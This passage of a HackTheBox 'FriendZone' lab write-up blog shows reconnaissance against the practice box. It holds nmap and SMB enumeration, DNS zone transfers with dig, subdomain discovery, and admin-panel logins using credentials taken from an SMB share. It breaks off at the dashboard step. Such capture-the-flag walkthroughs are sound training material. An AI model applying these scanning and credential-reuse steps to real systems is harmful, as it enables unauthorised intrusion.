<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>HackTheBox - FriendZone | amirr0r</title><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="HackTheBox - FriendZone" /><meta name="author" content="amirr0r" /><meta property="og:locale" content="en_US" /><meta name="description" content="Foothold" /><meta property="og:description" content="Foothold" /><link rel="canonical" href="https://amirr0r.github.io/posts/htb-friendzone/" /><meta property="og:url" content="https://amirr0r.github.io/posts/htb-friendzone/" /><meta property="og:site_name" content="amirr0r" /><meta property="og:image" content="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/FriendZone.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-12-31T17:55:29+01:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/FriendZone.png" /><meta property="twitter:title" content="HackTheBox - FriendZone" /><meta name="twitter:site" content="@amirr0r_" /><meta name="twitter:creator" content="@amirr0r" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"description":"Foothold","headline":"HackTheBox - FriendZone","dateModified":"2020-12-31T17:55:29+01:00","datePublished":"2020-12-31T17:55:29+01:00","@type":"BlogPosting","image":"https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/FriendZone.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://amirr0r.github.io/posts/htb-friendzone/"},"url":"https://amirr0r.github.io/posts/htb-friendzone/","author":{"@type":"Person","name":"amirr0r"},"@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script> <script src="/app.js" defer></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">amirr0r</a></div><div class="site-subtitle font-italic"></div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/amirr0r" target="_blank"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/amirr0r_" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="https://www.linkedin.com/in/amir-barnat/?locale=en_US" target="_blank"> <i class="fab fa-linkedin-in"></i> </a> <a href="/feed.xml" > <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Refactor the HTML structure. --> <!-- Suroundding the markdown table with '<div class="table-wrapper">. and '</div>' --> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>HackTheBox - FriendZone</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Thu, Dec 31, 2020, 5:55 PM +0100" > Dec 31, 2020 <i class="unloaded">2020-12-31T17:55:29+01:00</i> </span> by <span class="author"> amirr0r </span></div><div> Updated <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sat, Jan 16, 2021, 2:03 PM +0100" > Jan 16, 2021 <i class="unloaded">2021-01-16T14:03:52+01:00</i> </span></div></div><div class="post-content"> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/FriendZone.png" class="post-preview-img"><h2 id="foothold">Foothold</h2><h3 id="nmap-scan"><code class="language-plaintext highlighter-rouge">nmap</code> scan</h3><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
</pre><td class="rouge-code"><pre><span class="nv">$ </span>nmap <span class="nt">-min-rate</span> 5000 <span class="nt">--max-retries</span> 1 <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-p-</span> <span class="nt">-oN</span> FriendZone-full-port-scan.txt 10.10.10.123
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 <span class="o">(</span>RSA<span class="o">)</span>
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b <span class="o">(</span>ED25519<span class="o">)</span>
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 <span class="o">(</span>Ubuntu Linux<span class="o">)</span>
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span>
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: 404 Not Found
| ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>friendzone.red/organizationName<span class="o">=</span>CODERED/stateOrProvinceName<span class="o">=</span>CODERED/countryName<span class="o">=</span>JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent <span class="nb">time</span>
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span>
Service Info: Hosts: FRIENDZONE, 127.0.1.1<span class="p">;</span> OSs: Unix, Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: <span class="nt">-36m13s</span>, deviation: 1h09m16s, median: 3m45s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; <span class="o">(</span>unknown<span class="o">)</span>
| smb-os-discovery: 
|   OS: Windows 6.1 <span class="o">(</span>Samba 4.7.6-Ubuntu<span class="o">)</span>
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE<span class="se">\x</span>00
|   Domain name: <span class="se">\x</span>00
|   FQDN: friendzone
|_  System <span class="nb">time</span>: 2020-12-29T13:18:07+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled <span class="o">(</span>dangerous, but default<span class="o">)</span>
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   <span class="nb">date</span>: 2020-12-29T11:18:07
|_  start_date: N/A
</pre></table></code></div></div><p>Thanks to this scan we identified a domain name: <code class="language-plaintext highlighter-rouge">friendzone.red</code>, so I added it to my <code class="language-plaintext highlighter-rouge">/etc/hosts</code>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/etc-hosts.png" alt="etc-hosts" /></p><h3 id="enum4linux">enum4linux</h3><p><code class="language-plaintext highlighter-rouge">enum4linux</code> identified a username:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/smb-user-friend.png" alt="user friend found" /></p><h3 id="ftp-ports-21">ftp (ports 21)</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/ftp.png" alt="ftp" /></p><h3 id="smb-ports-139--445">smb (ports 139 &amp; 445)</h3><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre><span class="nv">$ </span>smbclient <span class="nt">-L</span> //<span class="nv">$TARGET</span>
	Sharename       Type      Comment
	<span class="nt">---------</span>       <span class="nt">----</span>      <span class="nt">-------</span>
	print<span class="nv">$ </span>         Disk      Printer Drivers
	Files           Disk      FriendZone Samba Server Files /etc/Files
	general         Disk      FriendZone Samba Server Files
	Development     Disk      FriendZone Samba Server Files
	IPC<span class="nv">$ </span>           IPC       IPC Service <span class="o">(</span>FriendZone server <span class="o">(</span>Samba, Ubuntu<span class="o">))</span>
SMB1 disabled <span class="nt">--</span> no workgroup available
</pre></table></code></div></div><p>We can in the <strong>comment</strong> section that <code class="language-plaintext highlighter-rouge">Files</code> is in <code class="language-plaintext highlighter-rouge">/etc/</code>, so do <code class="language-plaintext highlighter-rouge">general</code> and <code class="language-plaintext highlighter-rouge">Development</code> directories probably.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/445-creds.png" alt="creds" /></p><p>We get some credentials that we will probably use later:</p><ul><li>username: <strong>admin</strong></li><li>password: <strong>WORKWORKHhallelujah@#</strong></li></ul><p>Plus, we can put files in <code class="language-plaintext highlighter-rouge">Development</code> directory.</p><h3 id="apache2429-ports-80">Apache/2.4.29 (ports 80)</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/80.png" alt="web" /></p><p>Another domain name: <code class="language-plaintext highlighter-rouge">friendzoneportal.red</code>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/80-dirb.png" alt="dirb" /></p><ul><li><strong>robots.txt</strong>:</li></ul><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/80-robots-txt.png" alt="robots.txt" /></p><h4 id="wordpress"><code class="language-plaintext highlighter-rouge">/wordpress</code></h4><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/80-wordpress.png" alt="wordpress" /></p><h3 id="fiendzonered-ports-443">fiendzone.red (ports 443)</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/friendzone-red.png" alt="friendzone.red" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/443-comment.png" alt="view-source friendzone.red" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/443-js-js.png" alt="friendzone.red /js/js" /></p><h4 id="admin"><code class="language-plaintext highlighter-rouge">/admin</code></h4><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/443-admin.png" alt="friendzone.red" /></p><h3 id="friendzoneportalred-ports-443">friendzoneportal.red (ports 443)</h3><blockquote><p>Do not forget to update <code class="language-plaintext highlighter-rouge">/etc/hosts</code></p></blockquote><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/443-friendzoneportal.png" alt="friendzoneportal" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/443-friendzoneportal-dirb.png" alt="dirb friendzoneportal" /></p><h3 id="adminfriendzoneportalred">admin.friendzoneportal.red</h3><p>Because of the <em>“creds for the admin THING:”</em> in <strong>creds.txt</strong>, I tried the subdomain <code class="language-plaintext highlighter-rouge">admin.friendzoneportal.red</code> and it worked:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/admin-panel.png" alt="admin panel" /></p><p>We’re successfully logged in with the credentials found via <a href="#smb-ports-139--445">smb</a>, but:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/success.png" alt="admin panel successfully logged in" /></p><p><em>“check for another one”</em>, let’s try with <code class="language-plaintext highlighter-rouge">dirb</code>.</p><p>Unfortunately:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/nothing.png" alt="nothing" /></p><h3 id="dns-port-53">DNS (port 53)</h3><blockquote><p>When DNS rely on TCP, usually it means that there are some zone transfer.</p></blockquote><h4 id="friendzonered">friendzone.red</h4><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre><span class="nv">$ </span>dig axfr @<span class="nv">$TARGET</span> friendzone.red  | <span class="nb">tee </span>services/53-friendzone-red.txt   
<span class="p">;</span> &lt;&lt;<span class="o">&gt;&gt;</span> DiG 9.16.8-Debian &lt;&lt;<span class="o">&gt;&gt;</span> axfr @10.10.10.123 friendzone.red
<span class="p">;</span> <span class="o">(</span>1 server found<span class="o">)</span>
<span class="p">;;</span> global options: +cmd
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.         604800  IN      AAAA    ::1
friendzone.red.         604800  IN      NS      localhost.
friendzone.red.         604800  IN      A       127.0.0.1
administrator1.friendzone.red. 604800 IN A      127.0.0.1
hr.friendzone.red.      604800  IN      A       127.0.0.1
uploads.friendzone.red. 604800  IN      A       127.0.0.1
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
<span class="p">;;</span> Query <span class="nb">time</span>: 100 msec
<span class="p">;;</span> SERVER: 10.10.10.123#53<span class="o">(</span>10.10.10.123<span class="o">)</span>
<span class="p">;;</span> WHEN: Thu Dec 31 14:59:06 CET 2020
<span class="p">;;</span> XFR size: 8 records <span class="o">(</span>messages 1, bytes 289<span class="o">)</span>
</pre></table></code></div></div><p>Okay so there are three other domain names:</p><ul><li><code class="language-plaintext highlighter-rouge">administrator1.friendzone.red</code></li><li><code class="language-plaintext highlighter-rouge">hr.friendzone.red</code></li><li><code class="language-plaintext highlighter-rouge">uploads.friendzone.red</code></li></ul><h4 id="friendzoneportalred">friendzoneportal.red</h4><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre><span class="nv">$ </span>dig axfr @<span class="nv">$TARGET</span> friendzoneportal.red | <span class="nb">tee </span>services/53-friendzoneportal.txt
<span class="p">;</span> &lt;&lt;<span class="o">&gt;&gt;</span> DiG 9.16.8-Debian &lt;&lt;<span class="o">&gt;&gt;</span> axfr @10.10.10.123 friendzoneportal.red
<span class="p">;</span> <span class="o">(</span>1 server found<span class="o">)</span>
<span class="p">;;</span> global options: +cmd
friendzoneportal.red.   604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.   604800  IN      AAAA    ::1
friendzoneportal.red.   604800  IN      NS      localhost.
friendzoneportal.red.   604800  IN      A       127.0.0.1
admin.friendzoneportal.red. 604800 IN   A       127.0.0.1
files.friendzoneportal.red. 604800 IN   A       127.0.0.1
imports.friendzoneportal.red. 604800 IN A       127.0.0.1
vpn.friendzoneportal.red. 604800 IN     A       127.0.0.1
friendzoneportal.red.   604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
<span class="p">;;</span> Query <span class="nb">time</span>: 104 msec
<span class="p">;;</span> SERVER: 10.10.10.123#53<span class="o">(</span>10.10.10.123<span class="o">)</span>
<span class="p">;;</span> WHEN: Thu Dec 31 15:01:19 CET 2020
<span class="p">;;</span> XFR size: 9 records <span class="o">(</span>messages 1, bytes 309<span class="o">)</span>
</pre></table></code></div></div><p>We found three additional domain names:</p><ul><li><code class="language-plaintext highlighter-rouge">files.friendzoneportal.red</code></li><li><code class="language-plaintext highlighter-rouge">imports.friendzoneportal.red</code></li><li><code class="language-plaintext highlighter-rouge">vpn.friendzoneportal.red</code></li></ul><h3 id="aquatone"><code class="language-plaintext highlighter-rouge">aquatone</code></h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/subdomains.png" alt="subdomains" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/aquatone.png" alt="aquatone" /></p><p>We open <code class="language-plaintext highlighter-rouge">aquatone_report.html</code> with <code class="language-plaintext highlighter-rouge">firefox</code>.</p><p>Among all the new domain names we identified, the only ones that didn’t respond with a <strong>404 Not Found</strong> error were <code class="language-plaintext highlighter-rouge">uploads.friendzone.red</code> and <code class="language-plaintext highlighter-rouge">administrator1.friendzone.red</code>.</p><h3 id="uploadsfriendzonered">uploads.friendzone.red</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/uploads.png" alt="uploads" /></p><p>I uploaded a benign picture and it seems that the upload worked:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/upload.png" alt="uploads" /></p><p>I looked for hidden directories in order to retrieve the image that I uploaded but <code class="language-plaintext highlighter-rouge">/files</code> seems empty and <code class="language-plaintext highlighter-rouge">/files/note</code> that the site is still under development:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/uploads-dirb.png" alt="uploads" /></p><h3 id="administrator1friendzonered">administrator1.friendzone.red</h3><p>The credentials found via <a href="#smb-ports-139--445">smb</a> worked as well on this second admin panel:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/admin1.png" alt="second admin panel" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/admin1-login-done.png" alt="login done" /></p><ul><li><code class="language-plaintext highlighter-rouge">/dashboard.php</code>:</li></ul><p><img 